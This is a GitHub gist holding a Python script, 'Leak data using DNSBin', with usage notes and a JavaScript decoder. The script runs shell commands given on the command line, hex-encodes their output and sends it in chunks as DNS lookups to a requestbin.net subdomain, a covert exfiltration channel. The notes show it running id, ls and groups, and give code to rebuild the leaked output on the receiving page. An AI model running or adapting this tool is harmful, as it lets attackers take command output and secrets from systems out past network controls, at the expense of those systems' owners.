Skip to content

Instantly share code, notes, and snippets.

@djosix
Created July 3, 2020 03:58
Show Gist options
  • Save djosix/573f5a5ffc26f38da93bcb77a4663936 to your computer and use it in GitHub Desktop.
Save djosix/573f5a5ffc26f38da93bcb77a4663936 to your computer and use it in GitHub Desktop.
Leak data using DNSBin
#!/usr/bin/env python3
import socket, os
class DNSBinLeaker:
def __init__(self, dnsbin_id, leak_id='leak'):
assert len(dnsbin_id) == 20
assert all(c in '0123456789abcdef' for c in dnsbin_id)
assert 0 < len(leak_id) < 20 and leak_id.isalnum()
self.dnsbin_id = dnsbin_id
self.leak_id = leak_id
self.leak_count = 0
def leak(self, data):
if not isinstance(data, bytes):
# ensure bytes
data = str(data).encode()
data = ''.join(f'{b:02x}' for b in data) # hex encode
leak_count = self.leak_count
suffix = '{}-{}.{}.d.requestbin.net'.format(
self.leak_id, leak_count, self.dnsbin_id)
chunks_list = [[]]
for i in range(0, len(data), 32):
chunk = data[i:i+32]
if len(chunks_list[-1]) < 6:
chunks_list[-1].append(chunk)
else:
chunks_list.append([chunk])
for index, chunks in enumerate(chunks_list):
prefix = '.'.join(filter(bool, chunks))
hostname = '{}.{}.{}'.format(prefix, index, suffix)
socket.gethostbyname(hostname)
self.leak_count += 1
return leak_count
def system(self, cmd):
return self.leak(os.popen(cmd).read())
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--dnsbin', '-d', type=str)
parser.add_argument('--name', '-n', type=str, default='test')
parser.add_argument('cmds', nargs='+', type=str)
args = parser.parse_args()
leaker = DNSBinLeaker(args.dnsbin, args.name)
for cmd in args.cmds:
leaker.system(cmd)
'''
1. Create a DNSBin here and get your DNSBIN_ID:
http://requestbin.net/dns
2. Run this:
python3 dnsbin_leaker.py --dnsbin=DNSBIN_ID --name=test1 id ls groups 'ls / | wc -l'
3. Run this on the webpage: `collect`
function collect(id, n) {
$('.message-detail > h5').remove();
let getIndex = (a => Number(a[a.length - 2]));
let getData =
a => a.slice(0, a.length - 2)
.join('').match(/.{2}/g)
.map(c => String.fromCharCode(parseInt(c, 16)))
.join('');
return $('.message-detail').get()
.map(el => el.textContent)
.filter(c => c.endsWith(`.${id}-${n}`))
.map(x => x.split('.'))
.map(a => ({index: getIndex(a), data: getData(a)}))
.sort((a, b) => (a.index > b.index))
.map(x => x.data).join('');
};
console.log(collect('test1', 0));
console.log(collect('test1', 1));
'''
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment